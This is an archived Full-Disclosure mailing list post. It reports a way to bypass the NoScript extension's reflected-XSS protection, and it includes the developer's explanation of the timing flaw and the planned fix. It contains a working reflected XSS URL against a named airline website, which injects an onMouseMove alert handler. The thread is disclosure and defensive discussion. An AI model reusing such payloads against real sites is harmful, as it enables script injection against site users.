Fwd: NoScript (2.0.5.1 < less ) - Bypass "Reflective XSS" through Union SQL Poisoning Trick (SQLXSSI)

[dave b <db.pub.mail () gmail com>]

Bugtraq rejected my email so I am sending it to full disclosure instead...


---------- Forwarded message ----------
From: dave b <db.pub.mail () gmail com>
Date: 29 November 2010 22:54
Subject: NoScript (2.0.5.1 < less ) - Bypass "Reflective XSS" through
Union SQL Poisoning Trick (SQLXSSI)
To: bugtraq () securityfocus com


Ok...

How about this:

This works against the latest noscript.
----------
ME:

It is exactly this --->


http://www.virginblue.com.au/Search/index.htm?search=\""; style=
position%3Aabsolute;top:0;left:0;z-index:1000;width:3000px;height%3A3000px
onMouseMove=alert(1) bgcolor=black"

I just reproduced it on a vanilla firefox with the latest noscript installed.
(noscript blocking the domain -> enable moving the mouse while
reloading -> xssed and it warns me about blocking a potential xss)

This is not an unrealistic thing to do (well the ordering  of events
is probably going to be a bit unrealistic or could be), because some
sites need javascript to be enabled.


----------
Giorgio:
OK, now I can see what you mean.
This is due to the page taking too long to reload after the domain has
been enabled: since NoScript checks for XSS only when the target page
is JavaScript-enabled, the page you're moving the mouse upon is not
sanitized yet (it will be after it reloads), the code is triggered.

This is not technically a bypass of the filter (the filter is working
correctly), but I recognize this, albeit an edge case, deserves to be
addressed.
I'm gonna disable event processing for just-enabled pages as long as
they don't get fully reload.

Thanks and best,
-- G

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/